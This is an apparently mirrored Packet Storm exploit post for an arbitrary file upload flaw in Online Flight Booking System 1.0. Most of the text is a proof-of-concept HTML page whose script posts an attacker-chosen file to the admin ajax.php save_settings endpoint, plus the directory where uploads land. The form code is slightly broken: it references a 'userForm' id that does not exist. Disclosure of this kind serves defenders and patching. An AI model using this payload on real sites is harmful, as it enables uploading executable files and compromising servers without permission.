Online Flight Booking System 1.0 Arbitrary File Upload
2024-9-26 02:49:21 Author: packetstormsecurity.com(查看原文) 阅读量:0 收藏

=============================================================================================================================================================================
| # Title : Online Flight Booking System 1.0 Remot File Upload vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits) |
| # Vendor : https://www.campcodes.com/downloads/online-flight-booking-management-system-source-code/?wpdmdl=5913&refresh=66bbf742d7abc1723594562 |
=============================================================================================================================================================================

[+] POC :

[+] The following html code uploads a executable malicious file remotely .

[+] Line 28 : Set your Target.

[+] save payload as poc.html

[+] payload :

<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>RFU</title>
</head>
<body>

<div class="form-group">
<label for="" class="control-label">Avatar</label>
<div class="custom-file">
<input type="file" class="custom-file-input rounded-circle" id="customFile" name="img" onchange="displayImg(this,$(this))">
<label class="custom-file-label" for="customFile">Choose file</label>
</div>
</div>

<input type="button" value="Save User" onclick="saveUser()">
</form>

<script>
function saveUser() {
var form = document.getElementById('userForm');
var formData = new FormData(form);

var xhr = new XMLHttpRequest();
xhr.open("POST", "http://127.0.0.1/Online_Flight_Booking_Management_System/admin/ajax.php?action=save_settings", true);

xhr.onload = function () {
if (xhr.status === 200) {
alert('User saved successfully');
} else {
alert('An error occurred while saving the user');
}
};

xhr.send(formData);
}
</script>

</body>
</html>

[+] Path : http://127.0.0.1/Online_Flight_Booking_Management_System/assets/img

Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================


文章来源: https://packetstormsecurity.com/files/181813/ofbs10-upload.txt
如有侵权请联系:admin#unsafe.sh